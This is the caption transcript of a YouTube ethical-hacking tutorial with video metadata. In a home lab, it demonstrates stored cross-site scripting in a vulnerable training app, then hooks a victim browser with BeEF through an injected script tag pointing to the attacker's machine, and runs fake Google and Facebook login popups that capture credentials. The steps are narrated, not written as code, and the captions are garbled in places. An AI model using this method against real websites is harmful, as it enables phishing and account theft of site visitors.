Cross-Site Scripting (XSS) Explained And Demonstrated By A Pro Hacker!

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

and click login that's it game over we got that username and password just like that hi and welcome back to another episode on how to hack and today i'll be teaching you ethical hacking via cross-site scripting so what does cross-site scripting means it means they allow us to literally plan our own code into any website allowing us to track the users redirect the website and do literally anything that you want and additionally we'll also be using browser exploitation framework to help us plot our own code our own script into any website so that we have full control of the entire site sounds pretty dangerous isn't it yes it is that's why big disclaimer right hacking is illegal if you want to hack hack in your own home lab environment just like what i'm doing here on wrap code which is installed in my own home lab environment by the way remember to subscribe to channel so that you can learn all about adequate hacking and penetration testing and like the video if all this content has been valuable and insightful for you so without further ado let us get started on today's tutorial [Music] so right in front of us we have webgood.net which is a vulnerable web application system for us to perform our penetration testing and all the ethical hacking techniques on this particular platform and right here on the left side i have cross site scripting and i can go ahead and click on the store xss so what does this do right here is it is very similar to any website you go to right any sites where you can post a comment post a review and right here on the email all i got to do now is go ahead and enter say my email all right loy leong young at loyola.com and all i got to do under the comment section is to go ahead and enter any comments so for example i can enter all right this is a test comment all right go ahead and click save comment so the first thing you want to do whenever you're encountering any features any functions is to go ahead and test it out and see what is considered as a normal behavior next up what you can do is now this is the exciting part this is the part where you are waiting for and that is to test whether the comment or the email section is vulnerable to cross-site scripting meaning are we able to plan our own script into the site so what i can do now is to go ahead and enter under the comments section or i can open script and i can close script and what i can do right in the middle is to go ahead and enter an alert to see if this will get loaded as a script rather than as a website content so i can go ahead and enter the following hacked by loy alright and i can close this with a semicolon go ahead and click save comment and boom we are in literally our own code just got loaded just like that as simple as that we managed to find one vulnerability in which we can now plot in our own malicious code and it's pretty easy isn't it and that's scary because you can literally try to find all these places text input box and you could try to plan any of the script in and that's it game over we are in so how can i demonstrate further about the ability for us to control the entire website so go ahead and click ok on this and go to the top left corner and i'll click under testing database i'll scroll down further and i can click rebuild database so the wonderful part about this on web code is that whenever you screw up anything all right you can easily try to reboot the entire database and you can start afresh so that's wonderful that's amazing because you can keep testing different techniques and you will not have to worry about actually taking down the entire server so that's fantastic so once the database has been rebuilt right you can go ahead and go back to cross-site scripting click under store xss and what i can do here now is to go ahead and open up browser exploitation framework so i have already downloaded it and i can go ahead and cd bif all right and it can enter ls to see all the files that are part of the biff and you can easily do a git clone on this and this is the link to github where you can download browser exploitation framework for you to run and implant all this malicious code and script into any website so i have already downloaded it and all i got to do now is go ahead and start a browser exploitation framework so i can enter sudo dot slash beef hit enter on this enter your password for super user hit enter and now we are loading up browser exploitation framework so next up what we can do here the important part is this particular item this particular row which is called hook url so this is the javascript which will then allow us the ability to plan it into literally any website that you have found a vulnerability for cross-site scripting on so all i got to do now is do it right-click and i can click under the copy link address i can go back to any browser and paste it over here and hit enter and this is right as you can see here jquery javascript all these different details right here okay and some parts of it you can easily copy it and that would allow you access to different components of a browser so once you got a link all right all we got to do is ensure that we can copy the link go back to the vulnerable website and in this case i can go and enter email so i loy leongyan at loyolan.com and under the comment section i can go and enter script source equal okay and i can do a double quote and paste the link which will point us to the javascript file and i can now close the script so once i close the script i can go ahead and click save comment all right so here we go we got it we're in we have just planted our malicious code into the website allowing us to track users and to control the entire website fully so what we can do now is do a right click and click inspect element to see if our script got loaded all right so i can see here we have content okay as the following and i can go ahead and open content and right here in the bottom left side i can see the following right we have the email which is loyalian and loylangen.com and right here we can see the following all right this is the part that we're looking for so we have script source and we got 192 168.0.106 which is our call linux machine followed by the port number is four four four four followed by slash hook dot js all right so we have planted our script into the site which has a vulnerable comment section and again you can plumb this anywhere it can be comment section it can be on a review section it can even be on the search section and so on so once you have it running all we got to do next is to log in to browser exploitation framework so going back to terminal all right we have the link to the user interface so all i got to do now is right click on the ui panel click open link and this will open up a new tab on firefox or any browser so go ahead and enter the username so in my case i have the username of loy leong young and i can enter a password that i've set during the creation of browser exploitation framework and once we log in you can see right here all right on the left side we have the following information so let me zoom in a little more so that it is easier for you to see so on the left side i have the ip addresses and i have the ip addresses of all those browsers who have came in and loaded the javascript that we have planted into any of these sites and here we have the online browser okay so right here we can see that this is the browser that's currently inside the platform and what i can do next is to go back into another browser okay so this is my host browser that i'm doing all these tutorials for you and when i go under the cross-site scripting i click on the store xss and i clicked on it and what we are seeing here is that we have just loaded the script too as you can see right here email as well as the comments section we test the script and we have verified that via inspect element going back to call linux we can see right here we have a new ip address coming in and we can tell that this is a windows 10 computer based on the pop-up that's showing right here on the left side and we can see all the browser capabilities so that we can prepare for the next type of cyber attack that we can launch against the browser and as you can see here we have the date stamp we have the browser language so i am coming from singapore and we can see that there are certain plugins that the browser can take in okay so we can see all these details and all this different kind of data but what's more interesting and more frightening is what can we do now that we have loaded our code what we can do is go under the command section and we can select under say for example social engineering and right here this is the part where we can actually control the website to display different kind of information back to the user literally all i got to do is enter say for example google phishing and i can click execute right so once i click execute and what we can see next is when i go back to the browser we are now being placed into a login page and this is scary isn't it because all we did was go to an actual website look at the comments the next thing you know you are hacked what else can we do going back to call linux going back to browser exploitation framework i can select say for example preditaf and again i'll now go ahead and click under execute and going back to the browser we see that there's a pop-up facebook session time now so very quickly there's a fake pop-up and say the user go ahead and enter the username or the email address and hit onto the password field and click login that's it game over we got that username and password just like that and if i go back to call linux i can see that there is a module results history i'll go ahead and click on it and right here we can see the email as well as the password of course this is not my real password so this is a password i use for demonstration purposes okay so if you're trying to log into my account using this password you will not be able to get access into the account all right i hope you learned something valuable in today's tutorial and if you have any questions feel free to leave a comment below and i'll try my best to answer any of your questions and we'll like share and subscribe to the channel so that you can be kept abreast of the latest cyber security tutorial thank you so much once again for watching

Info

Channel: Loi Liang Yang

Views: 304,879

Rating: undefined out of 5

Keywords: hacker, hacking, cracker, cracking, kali linux, kali, metasploit, ethical hacking, ethical hacker, penetration testing, penetration tester, owasp

Id: PPzn4K2ZjfY

Channel Id: undefined

Length: 9min 31sec (571 seconds)

Published: Sun Apr 18 2021